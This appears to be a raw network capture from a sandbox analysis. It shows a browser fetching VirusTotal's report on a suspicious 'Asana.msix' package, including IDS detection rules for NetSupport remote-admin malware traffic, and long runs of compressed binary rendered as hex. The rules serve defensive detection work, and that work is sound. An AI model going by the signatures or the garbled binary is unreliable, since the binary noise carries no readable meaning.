                                                                                                                                                                                                                    2024-04-25 19:55:25 UTC546INData Raw: 73 61 6e 61 2e 6d 73 69 78 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5a 49 50 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 61 73 74 5f 73 75 62 6d 69 73 73 69 6f 6e 5f 64 61 74 65 22 3a 20 31 37 31 34 30 37 30 35 38 36 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 61 6e 69 6e 67 66 75 6c 5f 6e 61 6d 65 22 3a 20 22 41 73 61 6e 61 2e 6d 73 69 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 66 69 72 73 74 5f 73 65 65 6e 5f 69 74 77 5f 64 61 74 65 22 3a 20 31 37 31 34 30 30 33 36 39 34 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 68 61 31 22 3a 20 22 32 39 39 36 32 64 61 61 32 64 37 36 38 37 31 63 34 66 32 65 37 36 30 39 61 38 33 39 38
                                                                                                                                                                                                                    Data Ascii: sana.msix" ], "type_description": "ZIP", "last_submission_date": 1714070586, "meaningful_name": "Asana.msix", "first_seen_itw_date": 1714003694, "sha1": "29962daa2d76871c4f2e7609a8398
                                                                                                                                                                                                                    2024-04-25 19:55:25 UTC1408INData Raw: 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 61 6c 65 72 74 5f 73 65 76 65 72 69 74 79 22 3a 20 22 68 69 67 68 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 6d 73 67 22 3a 20 22 50 4f 4c 49 43 59 2d 4f 54 48 45 52 20 4e 65 74 53 75 70 70 6f 72 74 20 4d 61 6e 61 67 65 72 20 69 6e 62 6f 75 6e 64 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 61 74 74 65 6d 70 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 69 64 22 3a 20 22 31 3a 35 33 35 33 39 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 73 6f 75 72 63 65 22 3a 20 22 53 6e 6f 72 74 20 72 65 67 69 73 74 65 72 65 64 20 75 73 65 72 20 72 75 6c 65 73 65 74 22 2c 0a 20 20 20
                                                                                                                                                                                                                    Data Ascii: , "alert_severity": "high", "rule_msg": "POLICY-OTHER NetSupport Manager inbound connection attempt", "rule_id": "1:53539", "rule_source": "Snort registered user ruleset",
                                                                                                                                                                                                                    2024-04-25 19:55:25 UTC1408INData Raw: 72 61 66 66 69 63 20 6f 6e 20 70 6f 72 74 20 34 34 33 20 28 50 4f 53 54 29 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 69 64 22 3a 20 22 31 3a 32 30 31 33 39 32 36 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 73 6f 75 72 63 65 22 3a 20 22 50 72 6f 6f 66 70 6f 69 6e 74 20 45 6d 65 72 67 69 6e 67 20 54 68 72 65 61 74 73 20 4f 70 65 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 75 6c 65 73 2e 65 6d 65 72 67 69 6e 67 74 68 72 65 61 74 73 2e 6e 65 74 2f 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 72 61 77 22 3a 20 22 61 6c 65 72 74 20 68 74 74
                                                                                                                                                                                                                    Data Ascii: raffic on port 443 (POST)", "rule_id": "1:2013926", "rule_source": "Proofpoint Emerging Threats Open", "rule_url": "https://rules.emergingthreats.net/", "rule_raw": "alert htt
                                                                                                                                                                                                                    2024-04-25 19:55:25 UTC1408INData Raw: 20 2d 3e 20 24 45 58 54 45 52 4e 41 4c 5f 4e 45 54 20 61 6e 79 20 28 6d 73 67 3a 5c 22 45 54 20 49 4e 46 4f 20 4e 65 74 53 75 70 70 6f 72 74 20 52 65 6d 6f 74 65 20 41 64 6d 69 6e 20 43 68 65 63 6b 69 6e 5c 22 3b 20 66 6c 6f 77 3a 65 73 74 61 62 6c 69 73 68 65 64 2c 74 6f 5f 73 65 72 76 65 72 3b 20 68 74 74 70 2e 6d 65 74 68 6f 64 3b 20 63 6f 6e 74 65 6e 74 3a 5c 22 50 4f 53 54 5c 22 3b 20 68 74 74 70 2e 75 73 65 72 5f 61 67 65 6e 74 3b 20 63 6f 6e 74 65 6e 74 3a 5c 22 4e 65 74 53 75 70 70 6f 72 74 20 4d 61 6e 61 67 65 72 5c 22 3b 20 64 65 70 74 68 3a 31 38 3b 20 66 61 73 74 5f 70 61 74 74 65 72 6e 3b 20 68 74 74 70 2e 63 6f 6e 74 65 6e 74 5f 74 79 70 65 3b 20 63 6f 6e 74 65 6e 74 3a 5c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d
                                                                                                                                                                                                                    Data Ascii: -> $EXTERNAL_NET any (msg:\"ET INFO NetSupport Remote Admin Checkin\"; flow:established,to_server; http.method; content:\"POST\"; http.user_agent; content:\"NetSupport Manager\"; depth:18; fast_pattern; http.content_type; content:\"application/x-www-form
                                                                                                                                                                                                                    2024-04-25 19:55:25 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 72 61 77 22 3a 20 22 61 6c 65 72 74 20 68 74 74 70 20 24 45 58 54 45 52 4e 41 4c 5f 4e 45 54 20 61 6e 79 20 2d 3e 20 24 48 4f 4d 45 5f 4e 45 54 20 61 6e 79 20 28 6d 73 67 3a 5c 22 45 54 20 49 4e 46 4f 20 4e 65 74 53 75 70 70 6f 72 74 20 52 65 6d 6f 74 65 20 41 64 6d 69 6e 20 52 65 73 70 6f 6e 73 65 5c 22 3b 20 66 6c 6f 77 3a 65 73 74 61 62 6c 69 73 68 65 64 2c 66 72 6f 6d 5f 73 65 72 76 65 72 3b 20 68 74 74 70 2e 73 74 61 74 5f 63 6f 64 65 3b 20 63 6f 6e 74 65 6e 74 3a 5c 22 32 30 30 5c 22 3b 20 68 74 74 70 2e 63 6f 6e 74 65 6e 74 5f 74 79 70 65 3b 20 63 6f 6e 74 65 6e 74 3a 5c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 5c 22
                                                                                                                                                                                                                    Data Ascii: "rule_raw": "alert http $EXTERNAL_NET any -> $HOME_NET any (msg:\"ET INFO NetSupport Remote Admin Response\"; flow:established,from_server; http.stat_code; content:\"200\"; http.content_type; content:\"application/x-www-form-urlencoded\"
                                                                                                                                                                                                                    2024-04-25 19:55:25 UTC1408INData Raw: 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 75 6c 65 73 2e 65 6d 65 72 67 69 6e 67 74 68 72 65 61 74 73 2e 6e 65 74 2f 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 72 61 77 22 3a 20 22 61 6c 65 72 74 20 68 74 74 70 20 24 48 4f 4d 45 5f 4e 45 54 20 61 6e 79 20 2d 3e 20 24 45 58 54 45 52 4e 41 4c 5f 4e 45 54 20 61 6e 79 20 28 6d 73 67 3a 5c 22 45 54 20 50 4f 4c 49 43 59 20 4e 65 74 53 75 70 70 6f 72 74 20 47 65 6f 4c 6f 63 61 74 69 6f 6e 20 4c 6f 6f 6b 75 70 20 52 65 71 75 65 73 74 5c 22 3b 20 66 6c 6f 77 3a 65 73 74 61 62 6c 69 73 68 65 64 2c 74 6f 5f 73 65 72 76 65 72 3b 20 68 74 74 70 2e 72 65 71 75 65 73 74 5f 6c 69 6e 65 3b
                                                                                                                                                                                                                    Data Ascii: , "rule_url": "https://rules.emergingthreats.net/", "rule_raw": "alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"ET POLICY NetSupport GeoLocation Lookup Request\"; flow:established,to_server; http.request_line;
                                                                                                                                                                                                                    2024-04-25 19:55:25 UTC1408INData Raw: 75 6e 64 65 74 65 63 74 65 64 22 3a 20 34 37 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 61 72 6d 6c 65 73 73 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 69 6d 65 6f 75 74 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 6f 6e 66 69 72 6d 65 64 2d 74 69 6d 65 6f 75 74 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 66 61 69 6c 75 72 65 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 2d 75 6e 73 75 70 70 6f 72 74 65 64 22 3a 20 38 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 68 61 32 35 36 22 3a 20 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30
                                                                                                                                                                                                                    Data Ascii: undetected": 47, "harmless": 0, "timeout": 0, "confirmed-timeout": 0, "failure": 0, "type-unsupported": 8 }, "sha256": "76f98321f50595725f64f058d8f3310
                                                                                                                                                                                                                    2024-04-25 19:55:25 UTC1408INData Raw: 20 20 20 20 22 76 68 61 73 68 22 3a 20 22 65 65 32 39 61 64 64 30 36 36 37 63 35 64 30 63 66 63 37 63 36 37 63 66 35 37 65 66 35 35 38 66 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 61 67 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 7a 69 70 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 74 65 63 74 2d 64 65 62 75 67 2d 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 68 65 63 6b 73 2d 75 73 65 72 2d 69 6e 70 75 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 6f 6e 74 61 69 6e 73 2d 70 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 6f 6e 67 2d 73 6c 65 65 70 73 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "vhash": "ee29add0667c5d0cfc7c67cf57ef558f", "tags": [ "zip", "detect-debug-environment", "checks-user-input", "contains-pe", "long-sleeps" ],


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    101192.168.2.164985174.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:25 UTC924OUTGET /ui/files/submission/challenge HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTEzODg2Mjk3MDQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI0LjYyNg==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 51272af05b8a21287cb9287d10db4f49;o=1
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:26 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 63
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:26 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC63INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 68 61 6c 6c 65 6e 67 65 22 3a 20 22 36 43 4c 4e 4b 36 79 35 39 67 6f 46 46 43 30 53 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "data": { "challenge": "6CLNK6y59goFFC0S" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    102192.168.2.164985274.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:25 UTC688OUTGET /gui/2766.83fc8c19511961389f7a.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 5e395ca2976fb4c5de0eb607f81ece7e
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Fri, 19 Apr 2024 13:08:50 GMT
                                                                                                                                                                                                                    Expires: Sat, 19 Apr 2025 13:08:50 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "4IXFzQ"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 542796
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1051INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 66 66 61 0d 0a 00 00 02 ff ec bd fd 7a db 46 b2 f0 79 2b 32 8f e3 87 14 21 8a a4 3e 2c 53 82 78 1c 27 99 38 13 3b 99 d8 4e e2 28 1a 0d 45 41 12 62 0a 60 40 d0 92 22 eb fd 7b ff de 7b d9 1b d8 4b d9 2b d9 5f 55 7f a0 21 51 8e 92 33 73 9e 3d fb 4e 66 2c e2 a3 bb 51 5d 5d 5d 55 5d 55 5d dd 98 cf 92 a5 59 59 a4 e3 b2 b1 dd 9c 25 93 e3 ce 79 72 38 1d 8d df 3d 3b 9d 67 ef de 97 07 f3 f4 e0 6c 94 66 f1 47 de 7d f8 b0 b7 df ea 4c e7 b3 d3 e6 de 5e ff f1 e6 e6 7e 74 25 3f 83 66 19 65 51 d2 8a 77 af 8e e7 d9 b8 4c f3 6c a9 90
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000ffazFy+2!>,Sx'8;N(EAb`@"{{K+_U!Q3s=Nf,Q]]]U]U]YY%yr8=;glfG}L^~t%?feQwLl
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: a3 46 36 3f 3b 4c 0a 9a 76 68 b1 ec bb 75 45 8f 9a 65 0c c4 32 7a 45 dc 8d d2 0a c5 ad ab 6b cb 76 ae 66 83 34 ca 2a 9e e2 a9 a4 40 64 d9 b6 86 57 47 79 96 0c 1e 74 af 07 f6 aa 17 bd 1f 4d e6 c9 a0 dc 2b da ed fd eb eb 28 a9 5a 40 aa 95 a7 45 7e be 54 5e 47 c7 70 ad 6b 73 97 25 e7 4b af 19 91 cf 8b 22 2f 9a 8d e7 19 2d 20 c7 46 65 99 9c 4d cb a5 32 5f 32 a4 92 2c 65 79 b6 a2 d7 87 93 64 29 45 c4 8c b2 71 d2 f9 39 7b 9e 2d e5 c5 51 52 48 d9 43 de 08 a5 51 24 d2 0a 23 21 a9 a5 5c 87 7f b6 74 36 47 30 9d 8e de 27 4b a3 a5 5b 94 d9 6c 2d 9d 25 e5 69 7e d4 69 b4 ae 05 39 79 34 8f 1f 74 a3 51 fc a0 57 61 c5 93 23 98 8c 13 47 3e d7 75 5c 49 6d 70 dc c9 92 8b b2 e9 39 f9 1c cc 09 c6 22 30 50 47 0c 9f 10 d1 ac 98 09 3e 50 16 97 57 73 a7 82 24 1d 23 10 3e 7c 70 57
                                                                                                                                                                                                                    Data Ascii: F6?;LvhuEe2zEkvf4*@dWGytM+(Z@E~T^Gpks%K"/- FeM2_2,eyd)Eq9{-QRHCQ$#!\t6G0'K[l-%i~i9y4tQWa#G>u\Imp9"0PG>PWs$#>|pW
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: e0 b0 30 22 82 5b ad e1 71 b3 6c 4f 5a 03 65 19 27 49 f9 14 f2 48 0f e7 c2 0a ab 96 5a 98 9a a3 97 7f f8 93 c2 6a e0 ff c2 8c a6 23 19 e8 97 f9 51 62 f9 92 e3 d9 c7 f0 f9 47 8f 3c 54 19 0b 04 81 2a 1b 28 74 40 c6 a7 a1 6b 4c 6b 67 f9 7b 99 8c 87 16 8c a3 46 54 63 2a f3 61 e3 45 a3 3d 5e 9e c3 bf 1b ed f7 ed c6 97 8d f6 a4 dd f8 be d1 3e d3 6b de 0c a4 04 cf cc 7b 79 33 30 b5 28 cd 33 ad cb 53 4a 50 97 5a 5c bb 5a a6 84 7d c3 20 de c4 45 ef 9e e8 3f 6e 4a bf 4c b7 a2 37 a6 95 8a 54 a3 cf ec 13 43 74 42 a3 cd 4b 58 48 07 02 95 99 fc cc 7d c5 12 2c 06 57 a6 aa 85 e5 38 cf ca 95 59 fa 1b 13 ab d7 ad 3d 3c 1e 9d a5 13 68 a4 31 43 cc ad 30 5f d3 63 5f 4b be b1 82 9d f6 94 19 18 59 f6 8c e1 b6 28 1b 03 c3 c0 1b 70 0e 48 fb 2c 3d 3a 9a 08 5f 38 e8 24 23 cc 75 15
                                                                                                                                                                                                                    Data Ascii: 0"[qlOZe'IHZj#QbG<T*(t@kLkg{FTc*aE=^>k{y30(3SJPZ\Z} E?nJL7TCtBKXH},W8Y=<h1C0_c_KY(pH,=:_8$#u
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC311INData Raw: 22 a9 41 16 cd 0d 47 1d 45 93 68 8c 25 4a 1a 25 0c 08 e3 93 87 f0 d4 43 18 61 6d f2 61 15 c7 e6 9b 74 67 7b b4 73 6c 3e 4b bf 04 18 3e 3b 95 cf 8e 71 7a 69 7c d2 24 9a f8 9e 44 23 84 8a 88 c0 99 70 c4 e6 98 28 40 29 3b 19 cc b0 b1 94 cd 31 56 a1 b0 e5 53 6d d9 b7 64 ba 4b 1b b9 b6 d1 9c c4 b3 0e eb 72 9a 01 5d 8a 9e f0 5b b1 62 6d 86 35 0e 7f 5b 22 85 ee 42 dd e2 6e 98 b6 a5 2f 2d 74 16 e2 c1 0c 3a 59 76 bb d1 5f c2 ba 53 d1 44 e9 7b 59 15 40 c5 f3 05 1a 26 90 a7 c1 c2 07 79 4b 9c 19 fa 59 c3 88 ff 06 02 b5 bc 9b 0d e5 3a 6a 9e f8 7e 37 92 77 6e cb ab d8 5a 68 b0 fc ff 40 88 9b a8 65 a2 61 18 20 ff 7f 1d e3 66 bb fa 6f 6f df bf bd 7d b7 bd 7d 96 38 fe 85 ee be af ee 5a b2 7c 25 2a 22 36 2c 15 f0 95 02 e3 39 96 51 40 ac 6c 64 11 2a e6 ec 4f 13 a4 19 26 d2
                                                                                                                                                                                                                    Data Ascii: "AGEh%J%Camatg{sl>K>;qzi|$D#p(@);1VSmdKr][bm5["Bn/-t:Yv_SD{Y@&yKY:j~7wnZh@ea foo}}8Z|%*"6,9Q@ld*O&
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 7a 0d 0a 30 30 30 30 30 30 30 31 0d 0a 7e 0d 0a 30 30 30 30 30 30 30 31 0d 0a 7e 0d 0a 30 30 30 30 30 30 30 31 0d 0a de 0d 0a 30 30 30 30 30 30 30 31 0d 0a 39 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5f 0d 0a 30 30 30 30 30 30 30 31 0d 0a c3 0d 0a 30 30 30 30 30 30 30 31 0d 0a 87 0d 0a 30 30 30 30 66 66 38 0d 0a 70 b2 da 7b f2 e4 c9 ea c5 69 79 86 39 7c cc 1a 64 46 00 f5 82 62 fd 6e b7 bb ca bb 46 a4 65 07 93 32 ba c0 34 ff 6e 51 59 d3 a4 bc a5 f4 d9 64 51 91 1f 5f 7c 2d 5f de 5a f5 3a 8c 16 cd 66 8b 0a eb b7 69 28 9b ad 36 02 0b 0a f1 b6 0c a9 f0 59 56 4d ed 18 e9 8b 71 af b2 29 0c b0 29 b8 15 97 da 15 1a da 04 4b 4c dc 37 81 49 01 77 23 32 b0 32 32 24 b2 98 06 15 37 d7 36 84 f6 5f a9 f2 35 18 eb d6 89 49 8e 1a 30 28 af f9 bf 17
                                                                                                                                                                                                                    Data Ascii: 00000001z00000001~00000001~0000000100000001900000001_00000001000000010000ff8p{iy9|dFbnFe24nQYdQ_|-_Z:fi(6YVMq))KL7Iw#222$76_5I0(
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 62 14 bf 8c 69 12 17 9d 23 b1 a5 bf 69 c7 3c 23 75 cf 2b d6 2a 3d 17 4a 13 e5 27 40 c8 57 7f a0 de 62 c5 83 d6 de 05 7b 8b e3 2b 46 b7 66 3b 31 94 2d 03 38 f3 36 83 92 6c 08 62 0b 50 0e 61 5e a9 f3 9c e0 20 fb 4c a2 d9 c2 45 9f 0f ab 0c eb fc 92 13 96 da 58 22 28 10 03 8e 21 e9 da a7 43 3e 74 13 80 6d d2 4f dc 84 41 62 2a d8 07 9d 11 51 fd e7 e1 20 64 80 e1 c4 c0 e2 07 a1 9a ff 21 f0 2e 26 a3 6c 01 88 f5 69 96 10 ac 08 c1 fd ca 21 96 11 b4 27 0a ab a9 7a 42 9c f2 74 e6 35 7c a3 01 e1 78 a9 28 21 21 50 d7 cb 53 16 0b d4 df db 73 ba 84 a7 59 ab 32 ec c3 68 a1 87 2c 0b 2c 7c 49 78 53 8b 50 c8 b2 c8 04 b2 d6 ba 56 cd 16 bf 01 1e f1 8c 9d 47 bc b0 c6 19 13 8e 83 e9 81 5a 90 0c d7 65 c6 57 7e 21 99 0f f8 84 52 75 8a 57 cc 8f 9d 51 30 bf 0c 6f 30 de 2f d9 c9 2f
                                                                                                                                                                                                                    Data Ascii: bi#i<#u+*=J'@Wb{+Ff;1-86lbPa^ LEX"(!C>tmOAb*Q d!.&li!'zBt5|x(!!PSsY2h,,|IxSPVGZeW~!RuWQ0o0//
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1387INData Raw: c4 cf 48 b8 15 1a 11 e1 cd c6 16 e3 43 ef 9c 2d 06 86 9c 8b 21 46 8c 93 ba d8 48 51 83 dd 34 60 05 53 29 3f 66 76 8d d8 0f 16 80 25 9a 8e d1 5c 8c ed 14 9c 7b 02 b2 20 11 d0 ad 45 ac 4a 63 fa e7 a8 0d 5e 2b 9e 72 d8 7b e8 ed 11 13 b0 f5 61 db 02 c8 94 5a 09 92 69 b9 11 15 b8 ec 1e 24 a1 d0 58 74 28 db aa e4 d8 2b 07 0b c4 57 55 e4 a8 1c 9c 94 6c ed 31 60 5c 96 83 29 b6 5e 89 02 17 ed 5a 9c 7d b5 ce 06 0e d0 9b dd 64 bf eb 02 48 ce ee f8 fc 41 39 38 17 ff 0c 56 34 03 74 22 3e 0f 6c 97 03 71 4f 4a 8f 0c 9e 64 15 10 4d ed 3e 86 1a 28 7e a2 dd 0f 90 8b 3b 00 79 5a 0e 5e 18 40 f8 76 f0 61 71 4d 46 ea c3 4b 42 d3 48 35 de e2 a2 93 0d 26 32 cd 6e 82 20 43 ee c8 b5 50 8f 5c d5 23 d1 34 d4 8a 0a ce 75 49 0c 87 94 d0 69 d1 d9 1e 88 28 30 96 88 66 c2 14 76 51 f1 3e
                                                                                                                                                                                                                    Data Ascii: HC-!FHQ4`S)?fv%\{ EJc^+r{aZi$Xt(+WUl1`\)^Z}dHA98V4t">lqOJdM>(~;yZ^@vaqMFKBH5&2n CP\#4uIi(0fvQ>
